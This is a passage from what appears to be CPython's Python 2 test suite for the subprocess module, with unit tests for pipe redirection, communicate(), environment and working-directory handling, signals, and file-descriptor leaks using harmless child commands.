"import sys; sys.exit(47)"],
executable=sys.executable, cwd=python_dir)
p.wait()
self.assertEqual(p.returncode, 47)
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
p = subprocess.Popen(["somethingyoudonthave", "-c",
"import sys; sys.exit(47)"],
executable=sys.executable)
p.wait()
self.assertEqual(p.returncode, 47)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write("pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
d = tf.fileno()
os.write(d, "pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
tf.write("pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), "orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), "orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), "orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
self.addCleanup(p.stderr.close)
self.assertStderrEqual(p.stderr.read(), "strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), "strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), "strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertStderrEqual(stdout, b'42')
self.assertStderrEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.addCleanup(p.stdout.close)
self.assertStderrEqual(p.stdout.read(), "appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), "appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), 'test with stdout=1')
def test_cwd(self):
tmpdir = tempfile.gettempdir()
# We cannot use os.path.realpath to canonicalize the path,
# since it doesn't expand Tru64 {memb} strings. See bug 1063571.
cwd = os.getcwd()
os.chdir(tmpdir)
tmpdir = os.getcwd()
os.chdir(cwd)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getcwd())'],
stdout=subprocess.PIPE,
cwd=tmpdir)
self.addCleanup(p.stdout.close)
normcase = os.path.normcase
self.assertEqual(normcase(p.stdout.read()), normcase(tmpdir))
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), "orange")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate("pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, "pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate("banana")
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr, "pineapple")
# This test is Linux specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
fd_directory = '/proc/%d/fd' % os.getpid()
num_fds_before_popen = len(os.listdir(fd_directory))
p = subprocess.Popen([sys.executable, "-c", "print('')"],
stdout=subprocess.PIPE)
p.communicate()
num_fds_after_communicate = len(os.listdir(fd_directory))
del p
num_fds_after_destruction = len(os.listdir(fd_directory))
self.assertEqual(num_fds_before_popen, num_fds_after_destruction)
self.assertEqual(num_fds_before_popen, num_fds_after_communicate)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
if mswindows:
pipe_buf = 512
else:
pipe_buf = os.fpathconf(x, "PC_PIPE_BUF")
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("xyz"*%d);'
'sys.stdout.write(sys.stdin.read())' % pipe_buf],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = "abc"*pipe_buf
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write("banana")
(stdout, stderr) = p.communicate("split")
self.assertEqual(stdout, "bananasplit")
self.assertStderrEqual(stderr, "")
def test_universal_newlines(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'sys.stdout.write("line1\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line2\\r");'
'sys.stdout.flush();'
'sys.stdout.write("line3\\r\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line4\\r");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline5");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline6");'],
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
stdout = p.stdout.read()
if hasattr(file, 'newlines'):
# Interpreter with universal newline support
self.assertEqual(stdout,
"line1\nline2\nline3\nline4\nline5\nline6")
else:
# Interpreter without universal newline support
self.assertEqual(stdout,
"line1\nline2\rline3\r\nline4\r\nline5\nline6")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'sys.stdout.write("line1\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line2\\r");'
'sys.stdout.flush();'
'sys.stdout.write("line3\\r\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line4\\r");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline5");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline6");'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
if hasattr(file, 'newlines'):
# Interpreter with universal newline support
self.assertEqual(stdout,
"line1\nline2\nline3\nline4\nline5\nline6")
else:
# Interpreter without universal newline support
self.assertEqual(stdout,
"line1\nline2\rline3\r\nline4\r\nline5\nline6")
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
try:
for i in range(max_handles):
try:
handles.append(os.open(test_support.TESTFN,
os.O_WRONLY | os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
test_support.unlink(test_support.TESTFN)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(1)"])
count = 0
while p.poll() is None:
time.sleep(0.1)
count += 1
# We expect that the poll loop probably went around about 10 times,
# but, based on system scheduling we can't control, it's possible
# poll() never returned None. It "should be" very rare that it
# didn't go around at least twice.
self.assertGreaterEqual(count, 2)
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(2)"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
# Windows raises IOError. Others raise OSError.
with self.assertRaises(EnvironmentError) as c:
subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# ignore errors that indicate the command was not found
if c.exception.errno not in (errno.ENOENT, errno.EACCES):
raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(['nonexisting_i_hope'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate("x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
time.sleep(2)
p.communicate("x" * 2**20)
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
# context manager
class _SuppressCoreFiles(object):
"""Try to prevent core files from being created."""
old_limit = None
def __enter__(self):
"""Try to save previous ulimit, then set it to (0, 0)."""
if resource is not None:
try:
self.old_limit = resource.getrlimit(resource.RLIMIT_CORE)
resource.setrlimit(resource.RLIMIT_CORE, (0, 0))
except (ValueError, resource.error):
pass
if sys.platform == 'darwin':
# Check if the 'Crash Reporter' on OSX was configured
# in 'Developer' mode and warn that it will get triggered
# when it is.
#
# This assumes that this context manager is used in tests
# that might trigger the next manager.
value = subprocess.Popen(['/usr/bin/defaults', 'read',
'com.apple.CrashReporter', 'DialogType'],
stdout=subprocess.PIPE).communicate()[0]
if value.strip() == b'developer':
print "this tests triggers the Crash Reporter, that is intentional"
sys.stdout.flush()
def __exit__(self, *args):
"""Return core file behavior to default."""
if self.old_limit is None:
return
if resource is not None:
try:
resource.setrlimit(resource.RLIMIT_CORE, self.old_limit)
except (ValueError, resource.error):
pass
@unittest.skipUnless(hasattr(signal, 'SIGALRM'),
"Requires signal.SIGALRM")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGALRM, handler)
self.addCleanup(signal.signal, signal.SIGALRM, old_handler)
# the process is running for 2 seconds
args = [sys.executable, "-c", 'import time; time.sleep(2)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
signal.alarm(1)
# communicate() will be interrupted by SIGALRM
process.communicate()
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def test_exceptions(self):
# caught & re-raised exceptions
with self.assertRaises(OSError) as c:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd="/this/path/does/not/exist")
# The attribute child_traceback should contain "os.chdir" somewhere.
self.assertIn("os.chdir", c.exception.child_traceback)
def test_run_abort(self):
# returncode handles signal termination
with _SuppressCoreFiles():
p = subprocess.Popen([sys.executable, "-c",
"import os; os.abort()"])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_preexec(self):
# preexec function
p = subprocess.Popen([sys.executable, "-c",
"import sys, os;"
"sys.stdout.write(os.getenv('FRUIT'))"],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), "apple")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(
self, args, executable, preexec_fn, close_fds, cwd, env,
universal_newlines, startupinfo, creationflags, shell, to_close,
p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite):
try:
subprocess.Popen._execute_child(
self, args, executable, preexec_fn, close_fds,
cwd, env, universal_newlines,
startupinfo, creationflags, shell, to_close,
p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (p2cwrite, c2pread, errread))
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise RuntimeError("force the _execute_child() errpipe_data path.")
with self.assertRaises(RuntimeError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_args_string(self):
# args is a string
f, fname = tempfile.mkstemp()
os.write(f, "#!/bin/sh\n")
os.write(f, "exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.close(f)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), "apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), "apple")
def test_call_string(self):
# call() function with string argument on UNIX
f, fname = tempfile.mkstemp()
os.write(f, "#!/bin/sh\n")
os.write(f, "exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.close(f)
os.chmod(fname, 0700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), sh)
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn('KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, '')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, '')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
newfds = []
for a in fds:
b = os.dup(a)
newfds.append(b)
if a == 0:
stdin = b
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = test_support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
for b, a in zip(newfds, fds):
os.dup2(b, a)
for b in newfds:
os.close(b)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = [os.dup(fd) for fd in range(3)]
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = test_support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
for std, saved in enumerate(saved_fds):
os.dup2(saved, std)
os.close(saved)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = test_support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" % stderr)
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(EnvironmentError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_pipe_cloexec(self):
# Issue 12786: check that the communication pipes' FDs are set CLOEXEC,
# and are not inherited by another child process.
p1 = subprocess.Popen([sys.executable, "-c",
'import os;'
'os.read(0, 1)'
],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
p2 = subprocess.Popen([sys.executable, "-c", """if True:
import os, errno, sys
for fd in %r:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
else:
sys.exit(1)
sys.exit(0)
""" % [f.fileno() for f in (p1.stdin, p1.stdout,
p1.stderr)]
],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
p1.communicate('foo')
_, stderr = p2.communicate()
self.assertEqual(p2.returncode, 0, "Unexpected error: " + repr(stderr))
_libc_file_extensions = {
